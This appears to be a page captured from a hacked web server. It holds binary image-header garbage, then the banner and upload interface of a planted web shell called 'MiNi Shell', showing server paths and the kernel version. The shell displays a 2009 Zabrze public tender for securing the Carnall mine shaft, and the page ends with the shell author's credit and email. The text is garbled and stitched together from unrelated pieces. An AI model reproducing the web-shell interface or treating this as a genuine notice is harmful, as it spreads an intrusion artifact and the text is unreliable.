JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090417/63329-N-2009.html

<p class="kh_header"><b>Zabrze: Faza wstępna warunkująca wykonanie projektu pn. Europejski Ośrodek  Kultury Technicznej i Turystyki Przemysłowej w Zabrzu.
Udrożnienie i tymczasowe zabezpieczenie szybu Carnall, wyrobisk przyszybowych oraz 50 metrowego odcinka Głównej Kluczowej Sztolni Dziedzicznej wraz  z wykonaniem niezbędnej dokumentacji.</b><br>
<b>Numer ogłoszenia: 63329 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zabrze - Prezydent Miasta , ul. Powstańców Śląskich 5-7, 41-800 Zabrze, woj. śląskie, tel. (032) 3733537, 2710011, faks (032) 3733427, 2710818.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Faza wstępna warunkująca wykonanie projektu pn. Europejski Ośrodek  Kultury Technicznej i Turystyki Przemysłowej w Zabrzu.
Udrożnienie i tymczasowe zabezpieczenie szybu Carnall, wyrobisk przyszybowych oraz 50 metrowego odcinka Głównej Kluczowej Sztolni Dziedzicznej wraz  z wykonaniem niezbędnej dokumentacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Przedmiotem zamówienia - Faza wstępna warunkująca wykonanie projektu pn. Europejski Ośrodek  Kultury Technicznej i Turystyki Przemysłowej w Zabrzu. Udrożnienie i tymczasowe zabezpieczenie szybu Carnall, wyrobisk przyszybowych oraz 50 metrowego odcinka Głównej Kluczowej Sztolni Dziedzicznej wraz  z wykonaniem niezbędnej dokumentacji -  są roboty prowadzone w oparciu o Prawo geologiczne i górnicze w szczególności polegające na:
1. wykonaniu niezbędnej dokumentacji technicznej i technologicznej;
2. organizacji placu budowy oraz przeprowadzeniu udrożnienia i tymczasowego zabezpieczenia szybu Carnall do głębokości 5 metrów poniżej poziomu Głównej Kluczowej Sztolni Dziedzicznej  wraz z udrożnieniem fragmentu podszybia i wybranych wyrobisk przyszybowych, a także 50 metrowego odcinka nitki południowej GKSD w kierunku północno zachodnim;
3. wykonaniu prac końcowych związanych z zabezpieczeniem obiektu i przekazaniem terenu budowy.
II. Wykonawca wykona prace zgodnie z Programem funkcjonalno-użytkowym (dalej PFU), będącym załącznikiem nr 1 do Umowy, wytycznymi określonymi w SIWZ, z obowiązującymi przepisami i normami, sztuką budowlaną, przepisami BHP, ppoż., oraz poleceniami przedstawicieli Zamawiającego i osoby sprawującej nadzór konserwatorski.

III. Warunki rozliczenia wykonania przedmiotu zamówienia:
1. Wykonawca będzie się rozliczał za wykonane roboty po cenach jednostkowych zadeklarowanych w formularzu ofertowym zgodnie z zakresem robót zamieszczonym 
w formularzu ofertowym pkt. 2 (część A wg Spisu zawartości oferty);
2. Wykonawca poda cenę ryczałtową w formularzu ofertowym pkt. 3 (część A wg Spisu zawartości oferty), za wszystkie pozostałe roboty ujęte w PFU, w tym min.: koszty urządzenia, eksploatacji i likwidacji zaplecza budowy i placu budowy (w tym doprowadzenie i zużycie mediów (również w ramach nowych przyłączy )  koszty oznakowania terenu budowy, koszty przywrócenia terenów przyległych do stanu istniejącego po zakończeniu robót, koszty utrzymania na bieżąco w czystości dróg dojazdowych do terenu budowy oraz usuwania na bieżąco wszelkich odpadów 
i zbędnych materiałów koszty ubezpieczeń od odpowiedzialności cywilnej w zakresie prowadzonej działalności, koszty ochrony placu budowy, koszty dokumentacji zdjęciowej stanu istniejącego terenu oraz po zakończeniu zadania, koszty wszelkich robót przygotowawczych, porządkowych, niezbędne projekty, projektu organizacji placu budowy wraz z jego organizacją i późniejsza likwidacją, wszelkie koszty utrzymania zaplecza budowy, koszty obsługi geodezyjnej, koszty związane z odbiorami wykonanych robót, koszty wykonania dokumentacji powykonawczej, inwentaryzacji powykonawczej, koszty wyposażenia, maszyn i urządzeń, które pozostaną w obiekcie po zakończeniu prac oraz inne koszty wynikające z PFU i SIWZ.

IV. Szczegółowy opis przedmiotu zamówienia zawiera Część IV SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.22.12.00-4, 45.25.55.00-4, 45.22.12.30-3, 71.24.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 140.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 60.000,00 PLN, 
(słownie: sześćdziesiąt tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Wykonawca składa wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu.
 Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane dokumenty i zawarte w nich informacje.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające, że łącznie spełniają warunki udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawca jest zobowiązany dostarczyć  następujące dokumenty, w oparciu o które Zamawiający dokona oceny spełnia warunków:
1. W celu potwierdzenia, iż Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp:
A) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert;
B) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
C) aktualną informację z Krajowego Rejestru Karnego, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert potwierdzającą, że osób fizycznych, wspólników spółek jawnych, partnerów lub członków zarządu spółek partnerskich, komplementariuszy spółek komandytowych oraz spółek komandytowo-akcyjnych, urzędujących członków organu zarządzającego osób prawnych - będących Wykonawcą, nie skazano prawomocnie za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo, popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
D) aktualną informację Krajowego Rejestru Karnego, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, potwierdzającą, że podmioty zbiorowe - będące Wykonawcą, nie są podmiotami, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
2. W celu potwierdzenia, iż Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia :
A) wykaz obejmujący nie mniej niż 2 nie więcej niż 4 wykonane roboty górnicze o łącznej wartości nie mniejszej niż 2.000.000 PLN w tym jedna o wartości min. 1. 000. 000 PLN polegająca na drążeniu, zbrojeniu i remontach szybów,  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz dokumenty, potwierdzające, że roboty te zostały wykonane należycie. 
      Przez roboty odpowiadające przedmiotowi zamówienia należy rozumieć roboty górnicze polegające na drążeniu zbrojeniu i remontach szybów, drążeniu i przebudowie wyrobisk korytarzowych, wzmacnianiu obudowy szybów i wyrobisk korytarzowych w tym realizowanych techniką kotwienia.
B) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował Wykonawca, obejmujący nie mniej niż:

1) maszyna wyciągowa, wyciągarka lub inne urządzenie do transportu pionowego materiałów  spełniające wymagania odpowiednich przepisów wraz z osprzętem
2) ładowarka szybowa chwytakowa lub inna umożliwiająca załadunek urobku 
3) sprężarka do zasilania urządzeń pneumatycznych;
4) przenośnik taśmowy lub zgrzebłowy do załadunku urobku na samochody; 
5) samochody samowyładowcze 2 osiowe ze szczelną skrzynią ładunkową i plandekami o ładowności 6 do 8 ton - 2 szt.;
6) Ponadto Wykonawca musi posiadać możliwości techniczne do wykonania następujących urządzeń: 
	- pomosty szybowe i przedział drabinowy
	- zsuwnia i wysyp urobku wraz z konstrukcjami wsporczymi


C) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeśli w wykazie, o którym mowa w pkt B) wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował; a które nie są jego własnością;
D) wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności;
Zamawiający wymaga, aby osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadały następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz zakres wykonywanych czynności:
1. Kierownik działu robót górniczych	1 osoba
2.Osoba dozoru wyższego o specjalności górniczej	1 osoba
3. Osoby dozoru średniego o  specjalności górniczej	3 osoby
4. Kierownik działu energomechanicznego	1 osoba
5. Osoba dozoru wyższego o specjalności mechanicznej maszyn i urządzeń dołowych lub wyciągów szybowych	1 osoba
6. Osoby dozoru średniego lub niższego w specjalności mechanicznej maszyn i urządzeń dołowych lub wyciągów szybowych
	2 osoby
7. Osoba dozoru wyższego o specjalności elektrycznej maszyn i urządzeń dołowych
	1 osoba
8. Osoby dozoru średniego lub niższego o specjalności elektrycznej  maszyn i urządzeń dołowych    2 osoby

E) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeśli w wykazie, o którym mowa w pkt D) wykonawca wskazał osoby, którymi będzie dysponował;
F) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Zamawiający wymaga, zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 11 czerwca 2002 r. w sprawie kwalifikacji wymaganych od osób kierownictwa i dozoru ruchu zakładów górniczych, mierniczego górniczego i geologa górniczego oraz wykazu stanowisk 
w ruchu zakładu górniczego, które wymagają szczególnych kwalifikacji (Dz.U. z 2002r. nr 84 poz. 755 z późn. zm.)
-	Kierownik Działu Robót Górniczych                                    		        - 1 osoba 
Posiadający kwalifikacje do pełnienia funkcji Kierownika działu górniczego              w podziemnych zakładach górniczych,   
-	Osoba dozoru wyższego o specjalności górniczej            		        - 1 osoba
Posiadająca kwalifikacje osoby wyższego dozoru w specjalności górniczej 	               w podziemnych zakładach górniczych, 

-	Osoby dozoru średniego o  specjalności górniczej          		       -  3 osoby
Posiadające kwalifikacje w specjalności górniczej do 
Nadzorowania robót górniczych 

-	Kierownik działu energomechanicznego                           		        - 1 osoba
Posiadający kwalifikacje do pełnienia funkcji kierownika działu 
energomechanicznego w podziemnych Zakładach górniczych   

-	Osoba dozoru wyższego specjalności mechanicznej      
                   maszyn i urządzeń dołowych lub wyciągów szybowych    		       -  1 osoba                                                 
      	Posiadająca kwalifikacje osoby wyższego dozoru ruchu w specjalności mechanicznej  wyciągów szybowych w podziemnych zakładach górniczych

      -          	Osoby dozoru średniego lub niższego w specjalności     
                	mechanicznej maszyn i urządzeń dołowych lub wyciągów szybowych    - 2 osoby
Posiadające kwalifikacje w specjalności mechanicznej i urządzeń dołowych lub wyciągów szybowych do nadzorowania robót   
                                                  
-             	Osoba dozoru wyższego specjalności elektrycznej         
               	maszyn i urządzeń dołowych						       -  1 osoba
Posiadająca kwalifikacje osoby wyższego dozoru ruchu w specjalności elektrycznej maszyn i urządzeń dołowych           
                              

-            	Osoby dozoru średniego lub niższego specjalności         
             	elektrycznej  maszyn i urządzeń dołowych				       -  2 osoby
      		Posiadające kwalifikacje w specjalności elektrycznej maszyn i urządzeń dołowych  do   nadzorowania robót,
	
Zamawiający dopuszcza łączenie co najwyżej 2 różnych funkcji nadzoru robót przez 1 osobę. 
Nie dopuszcza łączenia się przez 1 osobę funkcji tożsamych, lub na dwóch zmianach.

3. W celu potwierdzenia, iż Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
A) polisę, a w przypadku jej braku inny dokument - aktualny na dzień składania ofert- potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - termin wykonania zamówienia - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> um.zabrze.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zabrzu, ul. Wolnosci 286, Wydział Strategii i Rozwoju Miasta, pokój 309, tel. : 032 37 33 524; fax : 032 37 33 485; osoba przekazująca : Aleksandra Margas; Anna Wieczorek; Tomasz Bugaj.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 09:30, miejsce: Urząd Miejski w Zabrzu, Biuro Zamówień Publicznych; ul. Wolnosci 286, 41 - 800 Zabrze, III piętro; pokój 305..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com